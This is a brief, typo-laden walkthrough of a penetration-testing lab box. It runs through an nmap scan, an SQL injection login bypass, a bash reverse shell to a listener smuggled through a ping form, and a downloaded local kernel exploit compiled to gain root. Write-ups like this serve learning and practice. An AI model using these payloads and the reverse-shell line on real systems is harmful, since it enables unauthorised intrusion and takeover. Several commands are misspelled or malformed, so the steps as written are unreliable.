We start by scanning the host by Nmap:
Namp the host with namp –A –T4 –p- <ip> -vvs
Visit the page on port 80 required admin login and password …
from nmap scan we can see mysql databaseI
using a sql injection code (admin’ or ‘1’=’1’#) in the username page and got through
in the ping part we can inserted bash -i >& /dev/tcp/<192.168.1.9>/<4444> 0>&1 to get a shell bash to the server
stight to privilege escalate run the command cat /etc/*-release
as we can see here the version which we can search for an exploit on google or just by using Searchsploit
i downloaded the exploit to my drive then started a SimpleHTTPServer to upload the exploit to the host
cd to the tmp folder and start a Wget command to download to patch file
Compile the file and run it … check for root
